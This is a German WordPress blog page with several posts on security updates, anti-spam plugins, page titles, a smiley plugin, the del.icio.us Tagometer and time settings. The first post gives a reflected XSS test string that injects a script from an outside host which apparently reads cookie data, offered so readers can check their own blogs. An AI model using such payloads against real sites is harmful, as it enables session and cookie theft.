Peruns Weblog - Webwork und Internet

Die neuen Versionen von WordPress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=

http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht – gut für Lesezeichenverwaltung und für die Suchmaschinen – der schaue sich bitte den Beitrag Optimaler Seitentitel in WordPress und die Kommentare an.

Seit 23. Juni 2006 habe ich Akismet im Einsatz und seit dem wurden durch dieses nützliches WordPress-Plugin 27 603 Spam-Kommentare und Spam-Trackbacks geblockt. Die Zahl wäre um einiges höher hätte ich nicht vor gut zwei Monaten wieder Bad Behaviour eingeschaltet, der schon im Vorfeld verdächtiges unterbindet. Je nach Aktivität der Spammer sind es üblicherweise 3000-4000 Spamverdächtige Aktivitäten die BB in der Woche blockt.

Ein guter Seitentitel ist sehr wichtig. Ich rede hierbei von dem Titel welcher sich oben in der Browserleiste befindet und durch das title-Element ausgezeichnet wird. Hier eine Abbildung:

Ein Aussagekräftiger Titel ist wichtig für den Besucher und zwar in zweierlei Hinsicht. Zum einen als Orientierung innerhalb der Website und zum anderen wird der Seitentitel bei den diversen Lesezeichen-Verwaltungen auch als Lesezeichen-Titel übernommen. Auch in Bezug auf die Optimierung einer Website für die Suchmaschinen ist der Seitentitel extrem wichtig. Da die Suchmaschinen den Seitentitel stark bewerten und weil bei der Auflistung des Suchergebnisse der Seitentitel benutzt wird. (weiterlesen…)

Es gibt eine Neue Version des Smiley-Plugins von Alex King. Diese neue Version soll angeblich unter WP 2.0.x und 2.1 funktionieren, für WP 2.0.x-Linie muss man zusätzlich die prototype.js, welche zum Umfang des Plugins gehört, in den Ordner /wp-includes/js/ hochladen.

Wenn man das Plugin aktiviert dann erscheint die Smiley-Leiste automatisch oberhalb des Kommentar-Formulars und unterhalb der Textbox in der man die Beiträge und Seiten verfasst.

Die Smileyes werden sowohl von dem Code- wie von dem visuellen Editor unterstützt. Ich habe dieses Plugin auf einem Weblog mit WP 2.1 ausprobiert und dort funktioniert es tadellos, hier in diesem Weblog hat es garnicht funktioniert.

Es gibt mal wieder ein neues Spielzeug von del.icio.us: Tagometer Badge. Es handelt sich um ein Stück Javascript welches in eine Website eingebunden werden kann.

Es wird dann angezeigt wie oft die jeweilige URL bei del.icio.us gespeichert wurde und unter welchen Tags (Schlüsselwörtern) die jeweilige Quelle einsortiert wurde.

Im Fall von Weblogs kann man diese Info entweder für die Hauptseite oder für jeden Beitrag einzeln ausgeben. Im Screenshot ist der Tagometer für dieses gesamte Weblog zu sehen bzw. wie viele Nutzer die URL www.perun.net bei del.icio.us gespeichert haben. Und wie das so ist, es gibt natürlich auch schon ein WordPress-Plugin dafür.

Nachtrag: es ist auch möglich die Tagometer-Funktionalität im Feedburner-Feed einzubinden. Dafür muss man innerhalb des Feedburner-Accounts in Options und dann in FeedFlare die Option "Save to del.icio.us" aktivieren.

Da Weblogs Websites sind die aus vielen einzelnen Beiträgen bestehen, macht es Sinn die "Popularität" eines Beitrages herausfinden und dies auch präsentieren zu wollen.

Was man unter "populär" versteht das definiert wahrscheinlich jeder anders. Für den Einen ist das eher ein Beitrag welcher polarisiert und u. U. eine sehr provokante Sprache hat und daher zu einer Diskussion anregt und für den Anderen ist es eher ein nützliches Tutorial welches durch konstruktive Kommentare erweitert und vervollständigt wird. Aber das ist eher eine philosophische Diskussion, hier geht es um die schnöde Technik. (weiterlesen…)

Wer wie ich kein Plugin für die Zeitumstellung einsetzt, der sollte in dem Menüpunkt

Einstellungen » Allgemein » Zeitdifferenz im Blog

den Wert von 2 auf 1 umstellen um das Weblog auf die Winterzeit umzustellen. Im nächsten Frühjahr gilt das hier.